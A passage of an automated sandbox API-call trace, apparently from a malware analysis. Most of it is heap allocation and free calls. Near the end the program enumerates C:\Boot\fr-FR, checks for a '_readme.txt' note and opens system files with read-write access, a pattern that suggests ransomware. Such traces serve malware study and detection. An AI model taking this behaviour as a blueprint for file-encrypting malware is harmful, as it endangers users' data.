lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.069] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.069] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.069] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.069] PathFindFileNameW (pszPath="") returned="" [0093.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.069] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.070] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.070] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.070] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0093.070] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0093.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.070] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0093.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.071] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.071] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.071] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.071] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0093.071] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.071] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3300420, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.071] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned=".txt" [0093.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.071] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3300420, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.071] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.071] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 